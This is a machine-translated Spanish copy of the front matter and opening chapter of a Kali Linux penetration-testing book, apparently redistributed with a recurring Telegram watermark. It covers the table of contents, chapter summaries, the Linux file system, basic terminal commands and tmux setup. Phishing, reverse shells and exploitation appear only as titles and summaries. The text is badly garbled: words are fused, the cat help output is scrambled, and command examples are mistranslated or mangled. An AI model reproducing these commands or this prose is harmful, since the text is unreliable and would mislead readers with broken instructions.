Machine Translated by Google Machine Translated by Google Tabla de contenido Cubrir Pagina del titulo Introducción ¿Que cubre este libro? CompanionDescargar archivos Cómo contactar con el editor Cómo contactar con el autor CAPÍTULO 1: Dominar la ventana de terminal KaliLinuxSistema de archivos Administración de usuarios y grupos en Kali Gestión de archivos y carpetas en Kali Linux ConexionesRemotasenKali Gestión del sistema KaliLinux Redes en KaliLinux Resumen CAPÍTULO 2: BashScripting BasicBashScripting Impresión en la pantalla en Bash Variables Parámetros de secuencia de comandos Entrada del usuario Funciones Condiciones y bucles Resumen CAPÍTULO 3: Exploración de hosts de red Conceptos básicos de las redes Escaneo de red Enumeración DNS Canal de Telegram : @IRFaraExam Machine Translated by Google Resumen CAPÍTULO 4:Recopilación de información en Internet Huella pasiva y reconocimiento Resumen CAPÍTULO 5: Ataques de ingeniería social SpearPhishingAtaques Cargas útiles y oyentes Ingeniería social con USBRubberDucky Resumen CAPÍTULO 6: Fase de enumeración avanzada Protocolos de transferencia Protocolos de correo electrónico Base de datosProtocolos Protocolos CI/CD Protocolos web80/443 Protocolos de comunicación remota gráfica Protocolos para compartir archivos Resumen CAPÍTULO 7: Fase de Explotación Evaluación de vulnerabilidades ServiciosExplotación Resumen CAPÍTULO 8: Vulnerabilidades de aplicaciones web Vulnerabilidades de aplicaciones web Resumen CAPÍTULO 9: Pruebas de penetración web y desarrollo de software seguro Ciclo vital WebEnumerationandExploitation Ciclo de vida de desarrollo de software seguro Resumen CAPÍTULO 10: Escalada de privilegios de Linux Canal de Telegram : @IRFaraExam Machine Translated by Google Introducción a las vulnerabilidades del kernel y las configuraciones que faltan Exploits del núcleo SUIDEexplotación Anulación del archivo de usuarios de contraseñas CRONJobsPrivilegeEscalation sudoers Explotación de los servicios de ejecución Scripts automatizados Resumen CAPÍTULO 11: Escalada de privilegios de Windows WindowsSystemEnumerationWindowsSystemEnumeration Transferencias de archivos WindowsSistemaExplotación Resumen CAPÍTULO 12: Pivote y movimiento lateral DumpingWindowsHashes Rotación con redirección de puertos Resumen CAPÍTULO 13: Criptografía y cracking hash Conceptos básicos de la criptografía Descifrando secretos con Hashcat Resumen CAPÍTULO 14: Informes Descripción general de informes en pruebas de penetración PuntuaciónGravedades InformePresentación Resumen CAPÍTULO 15: Lenguaje de ensamblaje e ingeniería inversa Registros de CPU Instrucciones de montaje Canal de Telegram : @IRFaraExam Machine Translated by Google Tipos de datos Segmentos de memoria Modos de direccionamiento Ejemplo de ingeniería inversa Resumen CAPÍTULO 16: Desbordamiento de búfer/pila Conceptos básicos de StackOverflow StackOverflowExplotación Resumen CAPÍTULO 17: Programación con Python Conceptos básicos de Python Ejecutar PythonScripts Depuración de PythonScripts PracticandoPython PythonBasicSyntaxes Variables MásTécnicasenPython Resumen CAPÍTULO 18: Automatización Pentest con Python PenetraciónPruebaRobot Resumen APÉNDICE A: APÉNDICE A KaliLinuxDesktopataGlance Descargar y ejecutar una VM de Kali Linux KaliXfceEscritorio Resumen APÉNDICEB:APÉNDICEBConstrucción de un entorno de laboratorio con Docker DockerTecnología Resumen Índice Derechos de autor Canal de Telegram : @IRFaraExam Machine Translated by Google Sobre el Autor Acerca del editor técnico Expresiones de gratitud Acuerdo de licencia de usuario final Lista de tablas Capítulo 1 Tabla 1.1 Métodos abreviados de teclado Tmux Capítulo 2 Tabla 2.1 Condiciones numéricas Tabla 2.2 Condiciones de cadena Tabla 2.3 Condiciones de archivo/directorio Capítulo 3 Table3.1OSICapas Tabla 3.2 Subredes y CIDR Tabla 3.3 Números de puertos comunes Table3.4NmapVersionIntensity Capítulo 4 Tabla 4.1 Los criterios de consulta más comunes utilizados en el sitio de Shodan Tabla 4.2 Google Dorks Common Queries Capítulo 14 Tabla 14.1 Calificación CVSSScore Capítulo 15 Tabla 15.1 Registros de banderas Tabla 15.2 Instrucciones de montaje Tabla 15.3 Instrucciones de salto de montaje Tabla 15.4 Instrucciones de montaje Canal de Telegram : @IRFaraExam Machine Translated by Google Tabla 15.5 Tipos de datos Tabla 15.6 Modos de direccionamiento Capítulo 17 Tabla 17.1 Operadores aritméticos Tabla 17.2 Formateadores de cadenas Tabla 17.3 Funciones de cadenas Tabla 17.4 Operadores de comparación Table17.5PythonEscapeCaracteres Lista de Ilustraciones Capítulo 1 Figura 1.1 TmuxNewWindow Figura 1.2 Nueva pestaña resaltada de Tmux Figura 1.3TmuxVerticalWindowsSidebySide Figura 1.4 TmuxHorizontalWindows Figura 1.5 KaliLinux OS Security Commands Figura 1.6 Kali Linux: comandos de archivos y carpetas Figura 1.7 Montaje USB Figura 1.8 Montaje mediante la línea de comandos Figura 1.9 “Inicio de sesión de Windows” Figura 1.10 SSH con Moba Xterm en Windows Figura 1.11 Conexión raíz SSH Figura 1.12 Estado del servicio SSH Figura 1.13 Generación de claves SSH Figura 1.14 Comandos de administración del sistema Kali Figura 1.15H ARRIBA Figura 1.16 Comandos de red de Kali Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 1.17 Interfaces de red de Kali Figura 1.18 Configuraciones IP estáticas Figura 1.19 Prueba de la conexión a Internet Capítulo 2 Figura 2.1 BashScripting Figura 2.2 ExportConfig Figura 2.3 Secciones de script Figura 2.4 Condiciones y bucles Capítulo 3 Figura 3.1 Protocolo de enlace TCPH Figura 3.2 Selección de interfaz de red de Wireshark Figura 3.3 Captura de Wireshark Figura 3.4 Filtro ICMP de Wireshark Capítulo 4 Figura 4.1 Shodan Figura 4.2 Google Dork Site Filter Figura 4.3 Google Dork Site Filter con descripción Figura 4.4 Google Hacking Database Figura 4.5 Menú Kali: recopilación de información Figura 4.6 MaltegoTransformHub Figura4.7MaltegoEntities Figura4.8MaltegoTransforms Figura4.9MaltegoToDomainsTransform Figura 4.10 Maltego Nombre de Dominio/DNS Figura 4.11 Transformaciones de Nombre de Dominio Figura 4.12 Gráfico Maltego Subdominios Capítulo 5 Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 5.1 Correo electrónico de administración Figura 5.2 BindShell Figura 5.3 ReverseShell Figura5.4VirusTotal Figura5.5USBRubberDucky Figura5.6USBRubberDuckyconMicroSD Figura 5.7 Ejecución de PowerShellinAdminMode Capítulo 6 Figura 6.1 Portal web de Jenkins Figura 6.2 Mensaje de error de Jenkins Figura 6.3 Configuración de red de Firefox Figura 6.4 KaliMenuÿBurpSuite Figura 6.5 BurpSuiteProxy Figura 6.6 BurpSuite: envío a repetidor Figura 6.7 Contenido POST Capítulo 7 Figura 7.1 OpenVASWebPortal Figura 7.2 OpenVASNewTarget Figura 7.3 Opciones de OpenVASTarget Figura 7.4 Opciones de OpenVASTTask Figure7.5OpenVASRunATask Figure7.6OpenVASReportResults Figure7.7OpenVAS–VulnerabilityResultsSample Figura 7.8Referencias de OpenVASÿReport Figura 7.9GoogleSearchforExploit Figura 7.10FileZillaFTPConnect Figura7.11FileZillaFTPConnectionEstablished Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 7.12 Búsqueda de Google: FTP Exploit Figura 7.13 Selección de interfaz de Wireshark Figura 7.14 Resultados de captura de Wireshark Figura 7.15 Wireshark: Seguir transmisión de TCP Figura 7.16 Wireshark: Captura de texto transparente Figura 7.17 Configuración de recepción de correo electrónico Figura 7.18 Configuración de envío de correo electrónico Figura 7.19 Bandeja de entrada de correo electrónico Figura 7.20 DockerHostDesign Figura 7.21 Página de inicio de Jenkins Figura 7.22Jenkins-Nuevo proyecto Figura 7.23 Jenkins–AddBuildStep Figura 7.24 Jenkins–ReverseShell Figura 7.25 SMBConnect Figura 7.26 Conexión SMB establecida Capítulo 8 Figura 8.1 Página de inicio de Mutillidae Figura 8.2 Búsqueda de DNS de Mutillidae Figura 8.3 Mutillidae–ScriptAlert Figura 8.4 Mutillidae–BlogEntry Figura 8.5 Troncos de Mutillidae Figura 8.6 Burpsuite–ProxyIntercept Figura 8.7BurpSuite–UserÿAgentEditar Figura 8.8 Mutillidae: mensaje de error de BadCharacters Figura 8.9BurpSuite–InterceptPayload Figura 8.10 BurpSuite–TargetHostScript Figura 8.11 Tabla de cuentas Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 8.12 AccountsTableÿSQLQuery Figura 8.13 Iniciar sesión SQLi Figura 8.14 Inicio de sesión SQLiQuery Figura 8.15 Resultados de LoginSQLi Figura 8.16 Mutillidae–LoginSQLi Figura 8.17 Mutillidae– Resultados de LoginSQLi Figura 8.18Sintaxis de SQLiÿUnionSelect Figura 8.19 SQLi: selección de unión Figura 8.20 SQLi: selección de unión con versión de base de datos Figura 8.21 Tabla de esquema: campo de tarjetas de crédito Figura 8.22 Consulta de tabla de tarjetas de crédito Figura 8.23 Extraer datos de tabla de tarjetas de crédito Figura 8.24 SQLQuery–Escribir en el sistema Figura 8.25 Error de SQLi Figura 8.26 Mutillidae: inyección de comandos Figura 8.27 Mutillidae: extracción de archivo de contraseña Figura 8.28 Mutillidae: inclusión de archivo remoto Figura 8.29 Página de blog de Mutillidae Figura 8.30 BurpSuite: generar CSRFPoC Figura 8.31 BurpSuite: generar CSRFCopyHTML Figure8.32CSRFPoCVictim Figure8.33CSRFPoCResults Figure8.34MutillidaeFileUpload Figura 8.35Mutillidae–FileUploadResults Figura 8.36 Carga de archivos POSTData Figura 8.37 Carga de archivos Post Data Cargas útiles Figura 8.38 BurpSuite–InterceptHexTab Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 8.39 Capítulo 9 de codificación de BurpSuite Figura 9.1 Certificado de BurpSuite Figura 9.2 Importación del certificado de Burp Suite Figura 9.3 Ficha Proxy de Burp Suite, sección Opciones Figura 9.4 Objetivo de BurpSuite Figura 9.5 Opción BurpSuiteAddToScope Figura 9.6 BurpSuiteInÿScopeFilter Figura 9.7BurpSuiteInÿScopeFilterAplicado Figura9.8BurpSuiteDiscoverContentMenuItem Figura 9.9BurpSuiteRunningDiscoverContentFeature Figura 9.10 BurpSuiteActiveScan Figura 9.11 Elemento de menú Enviar a repetidor de Burp Suite Figura 9.12 Cambio del parámetro UID Figura 9.13 Subficha BurpSuiteIntruderPositions Figura 9.14 BurpSuiteIntruderPayload Figura 9.15BurpSuiteIntruderPayloadOption Figura 9.16BurpSuiteIntruderAttack Figura 9.17 Ficha Extensor de BurpSuite Figura 9.18BAppStore Figura 9.19 Creación de informes en Burp Suite Figura 9.20 Ejemplo de informe en Burp Suite Figura 9.21 Ciclo de vida de desarrollo de software Figura 9.22 Ciclo de vida de desarrollo seguro Figura 9.23 Diagrama de red Figura 9.24 Diagrama de flujo de datos Capítulo 10 Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 10.1 Búsqueda de Google: capítulo 11 de DirtyCOWExploit Figura 11.1 Permisos de Windows Figura 11.2 Respaldo de Iperius Figura 11.3 Pestaña Acerca de Iperius Figura 11.4 ExploitÿDB–IperiusExploitation Figura 11.5 Iperius–Evil.batConfig Capítulo 12 Figura 12.1 Reenvío de puertos Figura 12.2 Diagrama de red ECorp Capítulo 13 Figura 13.1 Herramienta RSA Capítulo 14 Figura 14.1 Calculadora CVSS Figura 14.2 Resultados CVSS Capítulo 15 Figura 15.1 Registros generales de CPU Figura 15.2 Registros de índice Figura 15.3 Registros de puntero Figura 15.4 Registros de segmento Figura 15.5 Segmentos de memoria Figura 15.6 Inmunidad en pausa Figura 15.7 Instrucciones de la función principal Figura 15.8 Seguimiento en volcado Figura 15.9 Ventana de volcado de memoria Figura 15.10 Menú de mapa de memoria Figura 15.11 Ventana de mapa de memoria Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 15.12 HelloWorld.text Figura 15.13 Registros Figura 15.14 Pila Capítulo 16 Figura 16.1 Punteros de pila Figura 16.2PUSHEBP Figura 16.3 Depurador de inmunidad, apertura de un archivo Figura 16.4 Depurador de inmunidad, botón Ejecutar Figura 16.5 Mensaje de error Figura 16.6 Estructura de pila Figura 16.7 Llenar el búfer con As Figura 16.8 Desbordamiento de pila con A, B y C Capítulo 17 Figura 17.1 Ejecución de VSCode Figura 17.2 Extensión de Python Figura 17.3 Pylint Figura 17.4 Depuración Figura 17.5 Salida Capítulo 18 Figura 18.1 Flujo de trabajo de la aplicación Apéndice A Figura A.1 Elija Kali/Linux en el menú Cargar Figura A.2 Opción de instalación de Xfce FiguraA.3KaliDesktop Figura A.4 Menú Kali Figura A.5 Eliminar de favoritos Figura A.6 Agregar a favoritos Canal de Telegram : @IRFaraExam Machine Translated by Google Figura A.7KaliMenuTools FiguraA.8KaliSettingsMenu Figura A.9 Administración de la red Figura A.10 KaliDarkTheme Figura A.11 DesktopIcons Figura A.12 Cambio de fuentes Figura A.13 Configuración de apariencia Figura A.14 Cambiar el fondo del escritorio Figura A.15 Configuración del menú Figura A.16 Menú de aplicaciones Figura A.17 Gestión de espacios de trabajo Figura A.18 Configuración de iconos Figura A.19 Configuración de pantalla Figura A.20 Configuración avanzada de pantalla Figura A.21 KaliFileManager Figura A.22 Preferencias del Administrador de archivos Figura A.23 Comportamiento del Administrador de archivos Figura A.24 Configuración avanzada del Administrador de archivos Figura A.25 Configuración del teclado Figura A.26 Accesos directos de aplicaciones Figura A.27 Editor de tipos MIME Figura A.28 Configuración del mouse Figura A.29 Barra superior Figura A.30 Configuración del panel Figura A.31 Configuración de la apariencia del panel Figura A.32 Posición de los elementos del panel Figura A.33 Espacios de trabajo Canal de Telegram : @IRFaraExam Machine Translated by Google Figura A.34 Administrador de ventanas Figura A.35 Métodos abreviados de teclado de Windows Figura A.36 Ajustes de enfoque de ventana Figura A.37 Configuración del panel Figura A.38 Cambios en el panel superior Figura A.39 Adición de un panel Figura A.40 Configuración del nuevo panel Figura A.41 Agregar al panel Figura A.42 Resultados finales Figura A.43 Configuración de escritorio Figura A.44 Escritorio Fondo FiguraA.45IconsSettings FiguraA.46DesktopNewLook FiguraA.47GraphicalInstall Figura A.48 Idioma Figura A.49 Nombre de host Figura A.50 Nombre completo de usuario Figura A.51 Contraseña de usuario Figura A.52 Discos de partición Paso 1 Figura A.53 Discos de partición Paso 2 Figura A.54 Discos de partición Paso 3 Figura A. 55 Discos de partición Paso final Figura A. 56 Selección de software Figura A.57 Cargador GRUB Figura A.58 Instalación Realización Apéndice B Figura B.1 Comandos de Docker Canal de Telegram : @IRFaraExam Machine Translated by Google Figura B.2 DockerContainer Figura de ejemplo B.3 MutillidaeDBInit Figura B.4 Página de inicio de Mutillidae Canal de Telegram : @IRFaraExam Machine Translated by Google KaliLinuxPenetraciónPruebas Biblia GusKhawaja Canal de Telegram : @IRFaraExam Machine Translated by Google Introducción Kali es una distribución popular de Linux utilizada por profesionales de la seguridad y se está convirtiendo en una herramienta importante para el uso diario y para las certificaciones. KaliLinux Penetration Testing Bible es una guía práctica para sacar el máximo partido de Kali Linux para realizar pruebas de penetración. Este libro está destinado a profesionales de la ciberseguridad que trabajan en roles ofensivos y prácticos, incluidos los miembros del equipo rojo, los hackers de sombrero blanco y los hackers éticos. Este completo libro de pruebas de penetración cubre todos los aspectos del corazón y la ciencia de las pruebas de penetración. Cubre temas como la creación de un entorno Dockerizado moderno, los conceptos básicos del lenguaje bash en Linux, la búsqueda de vulnerabilidades de diferentes maneras, la identificación de falsos positivos y los flujos de trabajo prácticos de las pruebas de penetración. Al leer este libro, usted: Obtenga una comprensión profunda de los cientos de herramientas de prueba de penetración disponibles en Kali Linux. Domine toda la gama de técnicas de hacking ético para que pueda ser más eficaz en su trabajo y obtener las codiciadas certificaciones. Aprenda cómo funcionan las pruebas de penetración en la práctica y llene los vacíos en su conocimiento para convertirse en un experto en pruebas de penetración. Descubre las herramientas y técnicas que utilizan los hackers para potenciar las defensas de tu red. Canal de Telegram : @IRFaraExam Machine Translated by Google ¿Que cubre este libro? Este libro profundiza en el tema de las pruebas de penetración. Para los probadores de penetración establecidos, este libro llena todos los vacíos prácticos, por lo que tiene un recurso completo que lo ayudará a medida que avanza su carrera. Capítulo 1: Dominar la ventana del terminal Este capítulo describe el interior y el exterior de la ventana Terminal del sistema Linux y muestra cómo administrar el sistema de archivos como los profesionales. Aprenderá cómo administrar usuarios y grupos dentro de Kali, y verá cómo manipular archivos y carpetas durante sus compromisos y mucho más. Capítulo 2: Bash Scripting Bash scripting es una habilidad esencial para un probador de penetración. En este capítulo aprenderá cómo comenzar a usar principios de programación tales como variables, funciones, condiciones, bucles y mucho más. Capítulo 3: Exploración de hosts de red Este capítulo le enseña cómo realizar exploraciones de red como profesionales. Primero aprenderá sobre los aspectos básicos de las redes y luego profundizará en las técnicas de exploración de puertos. Capítulo 4: Recopilación de información en Internet En este capítulo se analiza la fase de recopilación pasiva de información en las pruebas de penetración. Se le presentará cómo manejar las consultas avanzadas del motor de búsqueda. Además, aprenderá a usar Shodan y otras herramientas para hacer el trabajo. Capítulo 5: Ataques de ingeniería social Este capítulo se centra en cómo aprovechar la debilidad humana para explotar las organizaciones. Aprenderá cómo enviar correos electrónicos de phishing y robar credenciales. Además, verá cómo usar Social Engineer Toolkit como un probador de penetración. Canal de Telegram : @IRFaraExam Machine Translated by Google ataques similares. Capítulo 6: Fase de enumeración avanzada Esta revisión del capítulo muestra cómo manejar la fase de enumeración en un compromiso de prueba de penetración. La enumeración significa recopilar la información necesaria que nos permitirá explotar el servicio específico (por ejemplo, FTP, SSH, etc.). Capítulo 7: Fase de explotación Este capítulo analiza algunos ataques reales y le muestra cómo ingresar a los sistemas. En los capítulos anteriores, tenía toda la información sobre cada servicio, y en este, daremos un paso más y explotaremos las vulnerabilidades. Capítulo 8: Vulnerabilidades de las aplicaciones web Este capítulo se enfoca en los aspectos básicos de las vulnerabilidades de las aplicaciones web. Capítulo 9: Pruebas de penetración web y ciclo de vida de desarrollo de software seguro En este capítulo, aprenderá principalmente sobre la metodología de las pruebas de penetración de aplicaciones web y cómo usar BurpSuite Pro. Finalmente, verá cómo implementar un ciclo de vida de desarrollo de software seguro (SSDLC) en una organización. Capítulo 10 : Escalada de privilegios de Linux Este capítulo se centra principalmente en la escalada de privilegios del sistema operativo Linux. Capítulo 11: Escalada de privilegios de Windows Este capítulo describe cómo el administrador administra los privilegios del sistema operativo Windows comprometido. Capítulo 12: Pivote y movimiento lateral Canal de Telegram : @IRFaraExam Machine Translated by Google Este capítulo describe cómo usar la técnica de pivote para moverse lateralmente en la red comprometida. Capítulo 13: Criptografía y cracking hash En este capítulo se describe cómo descifrar hashes durante sus compromisos con Hashcat. Capítulo 14 : Informes Este capítulo explica cómo presentar informes de pruebas de penetración profesionales. Además, aprenderá a evaluar con precisión la gravedad de sus hallazgos. Capítulo 15 : Lenguaje ensamblador e ingeniería inversa Este capítulo le presentará el concepto de ingeniería inversa utilizando el lenguaje ensamblador. Aprenderá los conceptos básicos del lenguaje ensamblador, incluidos los registros, las instrucciones de ensamblado, los segmentos de memoria y mucho más. Capítulo 16: Desbordamiento de búfer/ pila Este capítulo usará lo que aprendió en el capítulo anterior para explotar la pila usando la técnica de desbordamiento de búfer. Capítulo 17 : Programación con Python Este capítulo analiza los aspectos básicos de la versión 3 de Python. Este lenguaje de programación es la elección de los piratas informáticos, por lo que usted también debe aprenderlo. Capítulo 18 : Automatización de Pentest con Python Este capítulo se centra en la automatización de las fases de prueba de penetración utilizando el lenguaje Python. Verá un ejemplo práctico completo que puede utilizar en su carrera. Apéndice A: KaliLinuxDesktopataGlance Este apéndice se enfoca en cómo administrar la interfaz del entorno de escritorio Kali Linux. Aprenderá cómo manejar este sistema operativo con facilidad y personalizarlo a su gusto. Canal de Telegram : @IRFaraExam Machine Translated by Google Apéndice B: Creación de un entorno de laboratorio con Docker Este apéndice profundizará en Docker y verá cómo funcionan las imágenes y los contenedores en la práctica. CompanionDescargar archivos A medida que trabaje con los ejemplos de este libro, puede optar por escribir todo el código manualmente o utilizar los archivos de código fuente que acompañan al libro. Todo el código fuente utilizado en este libro está disponible para su descarga desde www.wiley.com/go/kalilinuxpenbible . Cómo contactar con el editor Si cree que ha encontrado un error en este libro, háganoslo saber. En John Wiley & Sons, comprendemos lo importante que es proporcionar a nuestros clientes un contenido preciso, pero incluso con nuestros mejores esfuerzos, es posible que se produzca un error. ocurrir. Para enviar su posible errata, envíela por correo electrónico a nuestro equipo de servicio al cliente wileysupport@wiley.com con el asunto “Posible envío de erratas de libros”. Cómo contactar con el autor ¡Agradecemos sus comentarios y preguntas acerca de este libro ! gus.khawaja@guskhawaja.me , Canal de Telegram : @IRFaraExam Machine Translated by Google CAPÍTULO 1 Dominar la ventana de la terminal KaliLinux se puede resumir en dos palabras sencillas: ventana de terminal. Si domina las habilidades de la ventana de terminal, entonces será uno de esos hackers éticos. Si ya sabe cómo administrar la ventana terminal, use este capítulo como referencia, o puede repasarlo rápidamente en caso de que haya algo nuevo que no haya aprendido antes. El objetivo principal de este capítulo no es solo mostrarle los comandos de Kali Linux, sino ayudarlo a comprenderlo profundamente a través de ejemplos prácticos. KaliLinux es un sistema operativo basado en Debian desarrollado por Offensive Security, por lo que si está acostumbrado a Ubuntu, por ejemplo, los comandos en la ventana del terminal se verán iguales ya que Debian y Kali comparten una distribución igual. Esto es lo que cubre este capítulo: KaliLinuxsistema de archivos Conceptos básicos de la ventana de terminal Administrar usuarios y grupos Manipulación de archivos y carpetas Gestión de conexiones remotas Gestión del sistema KaliLinux Manejo de redes en KaliLinux KaliLinuxSistema de archivos La comprensión de la estructura del sistema de archivos en Kali Linux es crucial. En Windows, el directorio raíz es C:\ pero ,en Kali Linux, es una barra hacia adelante ( / ). No confunda el término directorio raíz con el directorio principal del usuario raíz, que es /root porque , son dos cosas diferentes; el último es el directorio principal Canal de Telegram : @IRFaraExam Machine Translated by Google directorio para el usuario raíz. Hablando sobre el usuario raíz, es esencial comprender que este usuario es el equivalente al usuario administrador en los sistemas operativos Windows . Para obtener una representación visual de los directorios del sistema de archivos de Kali Linux, abra la ventana del terminal y ejecute el comando ls para enumerar el contenido del directorio del sistema raíz. Tenga en cuenta que, de manera predeterminada, estará en el directorio de inicio del usuario . kali@kali:~$cd/ kali@kali:/$ls binbootdevetchomeinitrd.imginitrd.img.oldliblib32lib64libx32lost+foundmediamntoptprocrootrunsbinsrvsystmpusr /bin (binarios): este directorio contiene binarios de Linux como el comando ls que ejecutamos anteriormente. /sbin (binarios del sistema): este directorio contiene archivos binarios del sistema que funcionan como comandos administrativos (p. ej., fdisk ). / boot : este directorio contiene los archivos del gestor de arranque de Linux. / dev (dispositivos): este directorio contiene los archivos de configuración del dispositivo (por ejemplo, /dev/null ). / sys : Esto es similar a / dev y drivers. , que contiene configuraciones sobre dispositivos / etc (etc.): este directorio contiene todos los archivos del sistema de administración (p. ej., /etc/passwd muestra todos los usuarios del sistema en Kali). / lib (bibliotecas): este directorio contiene las bibliotecas compartidas para los binarios dentro de /bin y / sbin . / proc (procesos): este directorio contiene los procesos y los archivos de información del núcleo. / lost+found :Como su nombre lo dice, este directorio contiene los archivos que han sido recuperados. / mnt (montar): este directorio contiene los directorios montados (por ejemplo, un recurso compartido de archivos remoto). Canal de Telegram : @IRFaraExam Machine Translated by Google / media : este directorio contiene los directorios montados en medios extraíbles (por ejemplo, DVD). / opt (opción): este directorio se usa para la instalación de paquetes de software complementarios. / tmp (temporal): esta es una carpeta temporal que se usa temporalmente; el contenido se borra después de cada reinicio. / usr (usuario): Este directorio contiene muchos subdirectorios. De hecho, /usr/share es una carpeta que necesita memorizar porque la mayoría de las herramientas que usa en KaliLinux (p. ej., Nmap, Metasploit, etc.) están almacenadas allí, y contiene los archivos de diccionario de listas de palabras ( /usr/share/wordlists/ ). / home :Este es el hogar para los usuarios de KaliLinux (por ejemplo, /home/john/ ). / root :Esteeseldirectorioprincipaldelusuarioraíz. / srv (servir): esta carpeta contiene algunos datos relacionados con las funcionalidades del servidor del sistema (por ejemplo, datos para servidores FTP). / var (variable): esta carpeta contiene datos variables para bases de datos, registros y sitios web . Por ejemplo, /var/www/html/ contiene los archivos para el servidor web Apache. / ejecutar (tiempo de ejecución): este directorio contiene datos del sistema de tiempo de ejecución (por ejemplo, usuarios registrados actualmente). TerminalWindowComandos básicos Hay muchos comandos comunes que usamos como probadores de penetración a diario. Muchos de estos comandos se enumerarán en las próximas secciones o más adelante en este libro. En esta sección, verá todas las herramientas estándar generales que yo personalmente uso con frecuencia. También aprenderá los comandos básicos identificados para uso general. Primero, para abrir la ventana del terminal desde el escritorio, puede usar la combinación de teclas Ctrl + Alt + T en lugar de abrir la aplicación desde su icono usando el cursor del ratón. Si desea obtener ayuda para cualquier comando que desea ejecutar, simplemente agregue - h o - - ayuda (algunos comandos requieren que use solo uno de ellos). Por ejemplo, si desea ver las diferentes opciones para el comando cat , simplemente escriba Canal de Telegram : @IRFaraExam Machine Translated by Google catÿÿhelp en la ventana de su terminal para obtener toda la ayuda necesaria con respecto a esto herramienta. En el siguiente comando ( catÿh ), verá que la opción ÿh no funciona para el comando cat . En su lugar, utilicé la opción ÿ ÿhelp . (El comando cat es se utiliza con frecuencia para mostrar el contenido de un archivo de texto en la ventana del terminal.) kali@kali:~$gato-h cat:invalidoption--'h' Try'cat--help'formoreinformation. kali@kali:~$gato--ayuda Uso:gato[OPCIÓN]…[ARCHIVO]… ConcatenarARCHIVO(s)a la salida estándar. Sin ARCHIVO, o cuando ARCHIVO es -A,--show-all-b,-number-nonblank -, leer entrada estándar. equivalente a FP numbernonemptyoutputlines,overrides- norte -Y equivalentto-vE mostrar$atendofeachline numerotodaslassalidaslineas suprimir líneas de salida vacías repetidas equivalente a-vT -T,--mostrar pestañas mostrarTABcaracteres como^I -tu (ignorado) -v,--show-nonprintinguse^andM-notation,exceptforLFDand -E,--mostrar-termina-n,-número-s,--apretar-t en blanco PESTAÑA --helpmostrarestaayudaysalir --versionoutputversioninformationandsalir Ejemplos: catf-gOutputf'scontents,thestandardinput,theng's contenido. gato Copie la entrada estándar en la salida estándar. GNUcoreutilsonlinehelp:<https:// www.gnu.org/software/coreutils/> Documentación completa en: <https://www.gnu.org/software/coreutils/cat> o disponible localmente a través de: info'(coreutils)catinvocation' Para borrar el texto de la ventana del terminal, ejecute el comando borrar o presione Ctrl +L hacereltrabajo. Para abrir una nueva pestaña de ventana de terminal, desde su sesión de terminal actual, presione Ctrl+Mayús+T. Para completar la entrada (p. ej., un nombre de archivo o un nombre de comando) automáticamente, utilizo Canal de Telegram : @IRFaraExam Machine Translated by Google la tecla Tabulador. ¿Qué sucede si varios archivos comienzan con el mismo texto? Luego, si presiona el tabulador dos veces, la ventana de la terminal mostrará todas las opciones en su lugar. (La mejor manera de entender este capítulo es abrir la ventana de la terminal y practicar mientras lee las instrucciones). Veamosunejemplo.Enmidirectorioprincipal ,tengodosarchivos , . ymemuestracat . prueba.txt , test.shypresionoTabuladorunavez , prueba. . dos veces, y me muestra la lista de archivos en el directorio actual. Finalmente, puedo abrir el archivo deseado, que es test.txt : root@kali:~#catprueba. Test.shtest.txt raíz @ kali: ~ prueba cattest.txt Para detener la ejecución de cualquier herramienta mientras se está ejecutando, puede usar el atajo de teclado Ctrl+C para detenerla. Para salir de la ventana del terminal y cerrarla, utilice el comando de salida o presione Ctrl +D para realizar el trabajo. Para reiniciar KaliLinux desde la ventana del terminal, debe usar el comando de reinicio, y para apagarlo, debe usar el comando de apagado. Ahora, para obtener la lista de comandos ejecutados recientemente, tendrá que usar el comando history . En Linux, debe comprender que usamos muchas direcciones en la ventana de la terminal. Por ejemplo, para guardar la salida del comando ls en un archivo, puedo redirigir la salida de la ventana de la terminal a un archivo de texto usando el carácter > (mayor que): kali@kali:~$ls>ls_file.txt kali@kali:~$catls_file.txtEscritorio Documentos Descargas ls_file.txt Música Imágenes Público Plantillas Vídeos Canal de Telegram : @IRFaraExam Machine Translated by Google Ahora, puede hacer lo contrario redirigiendo (imprimiendo) el contenido del archivo de texto a la ventana del terminal usando el carácter < (menor que): kali@kali:~$cat<ls_file.txtEscritorio Documentos Descargas ls_file.txt Música Imágenes Público Plantillas Vídeos Otra redirección que debe tener en cuenta es la canalización de comandos. En resumen, puede combinar la salida de cada comando y enviarla al siguiente mediante el comando | personaje: $comando1|comando2|comando3… Por ejemplo, leeré un archivo, luego ordenaré los resultados y finalmente usaré el comando grep para filtrar algunas cadenas de texto (el objetivo es extraer los archivos que comienzan con la palabra prueba): kali@kali:~$catls_file.txt|sort|greptest prueba.sh prueba.txt TmuxTerminalVentana Tmux es una ventana de terminal particular que le permite administrar varias ventanas en su sesión de terminal actual. La mejor manera de explicarlo es a través de ejemplos. Inicio de Tmux Para iniciar Tmux, simplemente escriba Tmux en la ventana de su terminal. Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 1.1 TmuxNewWindow ¿Y qué? Digamos que está en un compromiso y desea ejecutar Nma en una ventana, además de ejecutar Metasploit en otra, y pronto. Aquí es donde Tmu es útil, porque puede trabajar en varias ventanas/sesiones al mismo tiempo. TmuxKeyBindings En Tmux, debe usar Ctrl+B para indicarle que desea ejecutar una acción (comando) de Tmux. De hecho, la combinación de teclas Ctrl+Bis es la predeterminada. Siempre puede cambiar las configuraciones predeterminadas de Tmux en el archivo de configuración. Para cambiar este comportamiento y asignar Ctrl+A en lugar de Ctrl+B, entonces debe crear el archivo de configuración usted mismo por primera vez. Para hacer el trabajo, tiene dos opciones para crear un , . thekeybindingsinit): archivo de configuración en Tmux . root@kali:/#touch/etc/tmux.conf root@kali:/ #echounbindC-b>>/etc/tmux.conf root@kali:/#echoset-gprefixCa>>/etc/tmux.conf root @kali:/#echobindC-asend-prefix>>/etc/tmux.conf Canal de Telegram : @IRFaraExam Machine Translated by Google TmuxSessionManagement En la Figura 1.1, puede ver que el nombre bash se ha asignado automáticamente a su sesión actual. Cambiar nombre de ventana Para cambiar el nombre de la sesión, presione Ctrl + B primero (o Ctrl + A si realizó los cambios en los archivos de configuración que hicimos anteriormente). Luego retire los dedos del 